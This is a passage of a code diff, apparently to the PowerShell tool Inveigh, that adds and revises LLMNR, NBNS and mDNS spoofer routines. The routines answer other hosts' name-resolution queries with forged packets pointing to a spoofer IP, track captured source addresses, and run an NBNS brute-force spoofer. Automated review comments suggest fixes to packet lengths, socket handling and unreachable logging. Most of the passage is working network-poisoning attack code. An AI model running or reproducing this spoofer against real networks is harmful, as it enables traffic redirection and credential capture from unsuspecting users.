+ 0x00,0x00 +
+ $payload_bytes[0,1] +
+ 0x84,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00 +
+ $mDNS_response_data
+
+ if($mDNS -eq 'Y')
+ {
+
+ if((!$SpooferHostsReply -or $SpooferHostsReply -contains $mDNS_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $mDNS_query_string) -and (
+ !$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and (
+ $inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and ($mDNSTypes -contains 'QM'))
+ {
+ $send_socket = New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp )
+ $send_socket.SendBufferSize = 1024
+ $destination_point = New-Object System.Net.IPEndpoint([IPAddress]"224.0.0.251",5353)
+ $send_socket.SendTo($mDNS_response_packet,$destination_point)
+ $send_socket.Close()
+ $mDNS_response_message = "- response sent"
+ }
+ else
+ {
+
+ if($mDNSTypes -notcontains 'QM')
+ {
+ $mDNS_response_message = "- disabled mDNS type"
+ }
+ elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $mDNS_query_string)
+ {
+ $mDNS_response_message = "- $mDNS_query_string is not on reply list"
+ }
+ elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $mDNS_query_string)
+ {
+ $mDNS_response_message = "- $mDNS_query_string is on ignore list"
+ }
+ elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
+ {
+ $mDNS_response_message = "- $source_IP is not on reply list"
+ }
+ elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
+ {
+ $mDNS_response_message = "- $source_IP is on ignore list"
+ }
+ else
+ {
+ $mDNS_response_message = "- not spoofed due to previous capture"
+ }
+
}
+
}
+
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
+ }
+
}
+
}
5355 # LLMNR
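Review bot: the UDP length adjustments in the two mDNS branches do not match the payload they build. In the QU branch the response replaces the 4-byte type/class of the question with a 14-byte answer tail (type, class, TTL, rdlength, address), a net +10, which is what `$UDP_length[0] += 10` encodes; the QM branch builds the same 14-byte tail on top of the full name yet adjusts by only 4, which can only be right if the original query carried exactly six extra bytes after the question. Either compute the length from the bytes actually assembled (`$mDNS_response_packet.Length` before the header is prepended) or add a comment explaining the constant. Two smaller points: `$UDP_length[0] += 10` on a byte-typed array element will throw on values above 245 rather than carry into `$UDP_length[1]`, so derive the two bytes from an `[UInt16]` instead; and the QU and QM branches are roughly eighty identical lines differing only in the type label and destination endpoint, which would be one function taking those two arguments.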
@@ -2425,7 +2789,17 @@ $sniffer_scriptblock =
$LLMNR_UDP_client.Close()
$LLMNR_learning_log.Add("$(Get-Date -format 's') $LLMNR_transaction_ID $LLMNR_query_string")
$inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252")])
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252")
+ }
+
}
}
@@ -2493,10 +2867,21 @@ $sniffer_scriptblock =
if(!$LLMNR_request_ignore)
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")])
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
+ }
+
}
}
+
}
}
@@ -2531,7 +2916,17 @@ $sniffer_scriptblock =
{
$inveigh.valid_host_list.Add($LLMNR_query_string)
$inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list")])
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list")
+ }
+
}
}
@@ -2551,9 +2946,10 @@ $sniffer_scriptblock =
$memory_stream.Close()
}
+# Unprivileged LLMNR Spoofer ScriptBlock
$LLMNR_spoofer_scriptblock =
{
- param ($LLMNR_response_message,$SpooferIP,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$LLMNRTTL)
+ param ($Inspect,$LLMNR_response_message,$SpooferIP,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$LLMNRTTL)
$LLMNR_running = $true
$LLMNR_listener_endpoint = New-object System.Net.IPEndPoint ([IPAddress]::Any,5355)
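Review bot: `$Inspect` is inserted at the front of the `param` list rather than appended, so any caller that passes arguments positionally now hands the old first argument (`$LLMNR_response_message`) to `$Inspect`, where a non-empty string is truthy and silently puts the spoofer into inspect-only mode. Append new parameters, or switch the invocation to named arguments, and document `$Inspect` in the scriptblock header comment added here.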
@@ -2565,23 +2961,44 @@ $LLMNR_spoofer_scriptblock =
catch
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting LLMNR spoofer")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting LLMNR spoofer")])
$LLMNR_running = $false
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting LLMNR spoofer")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - Error starting LLMNR spoofer")
+ }
+
}
$LLMNR_multicast_group = [IPAddress]"224.0.0.252"
$LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group)
$LLMNR_UDP_client.Client.ReceiveTimeout = 5000
+ $LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL)
+ [Array]::Reverse($LLMNR_TTL_bytes)
while($inveigh.running -and $LLMNR_running)
{
- $LLMNR_request_data = $LLMNR_UDP_client.Receive([Ref]$LLMNR_listener_endpoint) # need to switch to async
+ try
+ {
+ $LLMNR_request_data = $LLMNR_UDP_client.Receive([Ref]$LLMNR_listener_endpoint)
+ }
+ catch
+ {
+ $LLMNR_UDP_client.Close()
+ $LLMNR_UDP_client = new-Object System.Net.Sockets.UdpClient 5355
+ $LLMNR_multicast_group = [IPAddress]"224.0.0.252"
+ $LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group)
+ $LLMNR_UDP_client.Client.ReceiveTimeout = 5000
+ }
- if([System.BitConverter]::ToString($LLMNR_request_data[($LLMNR_request_data.Length - 4)..($LLMNR_request_data.Length - 3)]) -ne '00-1c') # ignore AAAA for now
+ if($LLMNR_request_data -and [System.BitConverter]::ToString($LLMNR_request_data[($LLMNR_request_data.Length - 4)..($LLMNR_request_data.Length - 3)]) -ne '00-1c') # ignore AAAA for now
{
- $LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL)
- [Array]::Reverse($LLMNR_TTL_bytes)
$LLMNR_response_packet = $LLMNR_request_data[0,1] +
0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 +
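Review bot: the new `try`/`catch` around `Receive` treats every exception, including the expected 5-second `ReceiveTimeout`, as a reason to close and recreate the `UdpClient`; a timeout leaves the socket usable and does not need a rebind. Catch `[System.Net.Sockets.SocketException]`, continue on `SocketError.TimedOut`, and only rebuild the client for other errors. As written, if the `new-Object ... UdpClient 5355` inside the catch itself fails (port taken after a transient error) the exception escapes the loop and the spoofer thread dies without logging. Moving the TTL byte computation out of the loop is a good change.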
@@ -2594,7 +3011,7 @@ $LLMNR_spoofer_scriptblock =
$LLMNR_query_string = [Text.Encoding]::UTF8.GetString($LLMNR_request_data[13..($LLMNR_request_data[12] + 12)])
$source_IP = $LLMNR_listener_endpoint.Address.IPAddressToString
- if(($LLMNR_request_data -and $LLMNR_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and (
+ if(!$Inspect -and ($LLMNR_request_data -and $LLMNR_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and (
!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and (
$inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP))
{
@@ -2611,7 +3028,11 @@ $LLMNR_spoofer_scriptblock =
else
{
- if($SpooferHostsReply -and $SpooferHostsReply -notcontains $LLMNR_query_string)
+ if($Inspect)
+ {
+ $LLMNR_response_message = "- inspect only"
+ }
+ elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $LLMNR_query_string)
{
$LLMNR_response_message = "- $LLMNR_query_string is not on reply list"
}
@@ -2641,10 +3062,20 @@ $LLMNR_spoofer_scriptblock =
if($LLMNR_request_data)
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")])
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
+ }
+
}
- $LLMNR_request_data = ""
+ $LLMNR_request_data = ""
}
}
@@ -2652,9 +3083,236 @@ $LLMNR_spoofer_scriptblock =
$LLMNR_UDP_client.Close()
}
+# Unprivileged mDNS Spoofer ScriptBlock
+$mDNS_spoofer_scriptblock =
+{
+ param ($Inspect,$mDNS_response_message,$mDNSTTL,$mDNSTypes,$SpooferIP,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore)
+
+ $mDNS_running = $true
+ $mDNS_listener_endpoint = New-object System.Net.IPEndPoint ([IPAddress]::Any,5353)
+
+ try
+ {
+ $mDNS_UDP_client = New-Object System.Net.Sockets.UdpClient 5353
+ }
+ catch
+ {
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting mDNS spoofer")
+ $mDNS_running = $false
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting mDNS spoofer")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - Error starting mDNS spoofer")
+ }
+
+ }
+
+ $mDNS_multicast_group = [IPAddress]"224.0.0.251"
+ $mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group)
+ $mDNS_UDP_client.Client.ReceiveTimeout = 5000
+ $mDNS_TTL_bytes = [System.BitConverter]::GetBytes($mDNSTTL)
+ [Array]::Reverse($mDNS_TTL_bytes)
+
+ while($inveigh.running -and $mDNS_running)
+ {
+
+ try
+ {
+ $mDNS_request_data = $mDNS_UDP_client.Receive([Ref]$mDNS_listener_endpoint)
+ }
+ catch
+ {
+ $mDNS_UDP_client.Close()
+ $mDNS_UDP_client = new-Object System.Net.Sockets.UdpClient 5353
+ $mDNS_multicast_group = [IPAddress]"224.0.0.251"
+ $mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group)
+ $mDNS_UDP_client.Client.ReceiveTimeout = 5000
+ }
+
+ if([System.BitConverter]::ToString($mDNS_request_data) -like '*-00-01-80-01')
+ {
+ $mDNS_response_packet = $mDNS_request_data[0,1] +
+ 0x84,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00 +
+ $mDNS_request_data[12..($mDNS_request_data.Length - 5)] +
+ 0x00,0x01,0x00,0x01 +
+ $mDNS_TTL_bytes +
+ 0x00,0x04 +
+ ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
+
+ $mDNS_query_string = DataToString 13 $mDNS_request_data[12] $mDNS_request_data
+ $mDNS_query_string_full = $mDNS_query_string + ".local"
+ $source_IP = $mDNS_listener_endpoint.Address.IPAddressToString
+
+ if(!$Inspect -and ($mDNS_request_data -and $mDNS_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $mDNS_query_string) -and (
+ !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $mDNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and (
+ $mDNSTypes -contains 'QU') -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP))
+ {
+ $mDNS_destination_endpoint = New-Object Net.IPEndpoint($mDNS_listener_endpoint.Address,$mDNS_listener_endpoint.Port)
+ $mDNS_UDP_client.Connect($mDNS_destination_endpoint)
+ $mDNS_UDP_client.Send($mDNS_response_packet,$mDNS_response_packet.Length)
+ $mDNS_UDP_client.Close()
+ $mDNS_UDP_client = new-Object System.Net.Sockets.UdpClient 5353
+ $mDNS_multicast_group = [IPAddress]"224.0.0.251"
+ $mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group)
+ $mDNS_UDP_client.Client.ReceiveTimeout = 5000
+ $mDNS_response_message = "- response sent"
+ }
+ else
+ {
+
+ if($Inspect)
+ {
+ $mDNS_response_message = "- inspect only"
+ }
+ elseif($mDNSTypes -notcontains 'QU')
+ {
+ $mDNS_response_message = "- disabled mDNS type"
+ }
+ elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $mDNS_query_string)
+ {
+ $mDNS_response_message = "- $mDNS_query_string is not on reply list"
+ }
+ elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $mDNS_query_string)
+ {
+ $mDNS_response_message = "- $mDNS_query_string is on ignore list"
+ }
+ elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
+ {
+ $mDNS_response_message = "- $source_IP is not on reply list"
+ }
+ elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
+ {
+ $mDNS_response_message = "- $source_IP is on ignore list"
+ }
+ elseif($inveigh.IP_capture_list -contains $source_IP)
+ {
+ $mDNS_response_message = "- previous capture from $source_IP"
+ }
+ else
+ {
+ $mDNS_response_message = "- something went wrong"
+ }
+
+ }
+
+ if($mDNS_request_data)
+ {
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
+ }
+
+ }
+
+ $mDNS_request_data = ""
+ }
+ elseif([System.BitConverter]::ToString($mDNS_request_data) -like '*-05-6C-6F-63-61-6C-00-00-01-00-01-*')
+ {
+ $mDNS_response_packet = $mDNS_request_data[0,1] +
+ 0x84,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00 +
+ $mDNS_request_data[12..($mDNS_request_data[12] + 12)] +
+ 0x05,0x6c,0x6f,0x63,0x61,0x6c,0x00 +
+ 0x00,0x01,0x00,0x01 +
+ $mDNS_TTL_bytes +
+ 0x00,0x04 +
+ ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
+
+ $mDNS_query_string = DataToString 13 $mDNS_request_data[12] $mDNS_request_data
+ $mDNS_query_string_full = $mDNS_query_string + ".local"
+ $source_IP = $mDNS_listener_endpoint.Address.IPAddressToString
+
+ if(!$Inspect -and ($mDNS_request_data -and $mDNS_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $mDNS_query_string) -and (
+ !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $mDNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and (
+ $mDNSTypes -contains 'QM') -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP))
+ {
+ $mDNS_destination_endpoint = New-Object Net.IPEndpoint([IPAddress]"224.0.0.251",5353)
+ $mDNS_UDP_client.Connect($mDNS_destination_endpoint)
+ $mDNS_UDP_client.Send($mDNS_response_packet,$mDNS_response_packet.Length)
+ $mDNS_UDP_client.Close()
+ $mDNS_UDP_client = new-Object System.Net.Sockets.UdpClient 5353
+ $mDNS_multicast_group = [IPAddress]"224.0.0.251"
+ $mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group)
+ $mDNS_UDP_client.Client.ReceiveTimeout = 5000
+ $mDNS_response_message = "- response sent"
+ }
+ else
+ {
+
+ if($Inspect)
+ {
+ $mDNS_response_message = "- inspect only"
+ }
+ elseif($mDNSTypes -notcontains 'QM')
+ {
+ $mDNS_response_message = "- disabled mDNS type"
+ }
+ elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $mDNS_query_string)
+ {
+ $mDNS_response_message = "- $mDNS_query_string is not on reply list"
+ }
+ elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $mDNS_query_string)
+ {
+ $mDNS_response_message = "- $mDNS_query_string is on ignore list"
+ }
+ elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
+ {
+ $mDNS_response_message = "- $source_IP is not on reply list"
+ }
+ elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
+ {
+ $mDNS_response_message = "- $source_IP is on ignore list"
+ }
+ elseif($inveigh.IP_capture_list -contains $source_IP)
+ {
+ $mDNS_response_message = "- previous capture from $source_IP"
+ }
+ else
+ {
+ $mDNS_response_message = "- something went wrong"
+ }
+
+ }
+
+ if($mDNS_request_data)
+ {
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
+ }
+
+ }
+
+ $mDNS_request_data = ""
+ }
+
+ }
+
+ $mDNS_UDP_client.Close()
+ }
+
+# Unprivileged NBNS Spoofer ScriptBlock
$NBNS_spoofer_scriptblock =
{
- param ($NBNS_response_message,$SpooferIP,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$NBNSTTL)
+ param ($Inspect,$NBNS_response_message,$SpooferIP,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$NBNSTTL)
$NBNS_running = $true
$NBNS_listener_endpoint = New-Object System.Net.IPEndPoint ([IPAddress]::Broadcast,137)
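Review bot: in the mDNS scriptblock, when `New-Object System.Net.Sockets.UdpClient 5353` fails the catch sets `$mDNS_running = $false` but execution falls through to `$mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group)` and `$mDNS_UDP_client.Client.ReceiveTimeout = 5000` on a null client, which throws an unlogged error before the `while($inveigh.running -and $mDNS_running)` guard is ever reached; wrap the multicast join and timeout setup in `if($mDNS_running)` or move them into the try block. Second, the two request matchers are inconsistent: the QU pattern `'*-00-01-80-01'` is anchored at the end of the packet, while the QM pattern `'*-05-6C-6F-63-61-6C-00-00-01-00-01-*'` ends in `-*` and therefore requires at least one more byte after the class field, so a QM query whose single question is the last thing in the datagram (hex dump ending in `-00-01-00-01`) is never matched; drop the trailing `-*`, or better, test the parsed question type/class rather than a substring of the hex dump, which can also match inside a name or rdata. Finally, the close/recreate/join/timeout sequence for the UdpClient appears four times in this scriptblock and would be cleaner as one small helper.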
@@ -2666,19 +3324,41 @@ $NBNS_spoofer_scriptblock =
catch
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting NBNS spoofer")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting NBNS spoofer")])
$NBNS_running = $false
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting NBNS spoofer")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - Error starting NBNS spoofer")
+ }
+
}
$NBNS_UDP_client.Client.ReceiveTimeout = 5000
+ $NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL)
+ [Array]::Reverse($NBNS_TTL_bytes)
while($inveigh.running -and $NBNS_running)
{
- $NBNS_request_data = $NBNS_UDP_client.Receive([Ref]$NBNS_listener_endpoint) # need to switch to async
+ try
+ {
+ $NBNS_request_data = $NBNS_UDP_client.Receive([Ref]$NBNS_listener_endpoint)
+ }
+ catch
+ {
+ $NBNS_UDP_client.Close()
+ $NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137
+ $NBNS_UDP_client.Client.ReceiveTimeout = 5000
+ }
+
$IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
- if([System.BitConverter]::ToString($NBNS_request_data[10..11]) -ne '00-01')
+ if($NBNS_request_data -and [System.BitConverter]::ToString($NBNS_request_data[10..11]) -ne '00-01')
{
$NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL)
[Array]::Reverse($NBNS_TTL_bytes)
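Review bot: `$NBNS_TTL_bytes` is now computed and reversed once before the `while` loop, but the two unchanged context lines right after the `'00-01'` check do the same thing again on every request; delete the in-loop copy so there is one source of truth. The start-up catch also has the same gap as the mDNS scriptblock in the previous hunk: after `$NBNS_running = $false` the line `$NBNS_UDP_client.Client.ReceiveTimeout = 5000` still runs on a null client, so the error branch ends in a second, unlogged exception.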
@@ -2760,7 +3440,7 @@ $NBNS_spoofer_scriptblock =
}
until($n -gt ($NBNS_query_string_subtracted.Length - 1) -or $NBNS_query_string.Length -eq 15)
- if (($NBNS_request_data -and $NBNS_listener_endpoint.Address.IPAddressToString -ne '255.255.255.255') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and (
+ if(!$Inspect -and ($NBNS_request_data -and $NBNS_listener_endpoint.Address.IPAddressToString -ne '255.255.255.255') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and (
!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $NBNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and (
$inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP) -and ($NBNSTypes -contains $NBNS_query_type) -and ($source_IP -ne $IP))
{
@@ -2775,7 +3455,11 @@ $NBNS_spoofer_scriptblock =
else
{
- if($NBNSTypes -notcontains $NBNS_query_type)
+ if($Inspect)
+ {
+ $NBNS_response_message = "- inspect only"
+ }
+ elseif($NBNSTypes -notcontains $NBNS_query_type)
{
$NBNS_response_message = "- disabled NBNS type"
}
@@ -2813,7 +3497,17 @@ $NBNS_spoofer_scriptblock =
if($NBNS_request_data)
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")])
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
+ }
+
}
$NBNS_request_data = ""
@@ -2824,6 +3518,7 @@ $NBNS_spoofer_scriptblock =
$NBNS_UDP_client.Close()
}
+# NBNS BruteForce ScriptBlock
$NBNS_bruteforce_spoofer_scriptblock =
{
param ($SpooferIP,$NBNSBruteForceHost,$NBNSBruteForceTarget,$NBNSBruteForcePause,$NBNSTTL)
@@ -2863,12 +3558,21 @@ $NBNS_bruteforce_spoofer_scriptblock =
0x00,0x00,0x00,0x00
$inveigh.console_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget")])
$NBNS_paused = $false
$NBNS_bruteforce_UDP_client = New-Object System.Net.Sockets.UdpClient(137)
$destination_IP = [System.Net.IPAddress]::Parse($NBNSBruteForceTarget)
$destination_point = New-Object Net.IPEndpoint($destination_IP,137)
$NBNS_bruteforce_UDP_client.Connect($destination_point)
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget")
+ }
while($inveigh.running)
{
@@ -2879,8 +3583,18 @@ $NBNS_bruteforce_spoofer_scriptblock =
if($NBNS_paused)
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer")])
$NBNS_paused = $false
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer")
+ }
+
}
for ($i = 0; $i -lt 255; $i++)
@@ -2895,9 +3609,19 @@ $NBNS_bruteforce_spoofer_scriptblock =
if($inveigh.hostname_spoof -and $NBNSBruteForcePause)
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer")])
$NBNS_paused = $true
break NBNS_spoofer_loop
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer")
+ }
+
}
}
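Review bot: the new file_output and log_output blocks are placed after `break NBNS_spoofer_loop` and are therefore unreachable, so the "Pausing NBNS brute force spoofer" entry now reaches only the console queue and never the file queue or the in-memory log (the removed line wrote it before the break). Move the two `if` blocks above `break NBNS_spoofer_loop`, matching the order used in the "Resuming" block of the previous hunk.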
@@ -2912,9 +3636,10 @@ $NBNS_bruteforce_spoofer_scriptblock =
$NBNS_bruteforce_UDP_client.Close()
}
+# Control Loop ScriptBlock
$control_scriptblock =
{
- param ($NBNSBruteForcePause,$RunCount,$RunTime)
